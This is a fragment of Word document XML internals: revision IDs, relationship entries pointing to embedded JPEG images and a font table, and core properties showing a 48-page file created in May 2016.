    <w:rsid w:val="003A3C9D"/>
    <w:rsid w:val="004D72B5"/>
    <w:rsid w:val="005D7581"/>
    <w:rsid w:val="006B744B"/>
    <w:rsid w:val="00976EDB"/>
    <w:rsid w:val="00992F56"/>
    <w:rsid w:val="009F0C0A"/>
    <w:rsid w:val="00A5553A"/>
    <w:rsid w:val="00A7158C"/>
    <w:rsid w:val="00B021D6"/>
    <w:rsid w:val="00C9095C"/>
    <w:rsid w:val="00D7332F"/>
    <w:rsid w:val="00E36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228FD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0C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42.jpeg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml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5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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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48</Pages>
  <Words>1342</Words>
  <Characters>7652</Characters>
  <Application>Microsoft Macintosh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8977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2016-05-12T23:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-13T09:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>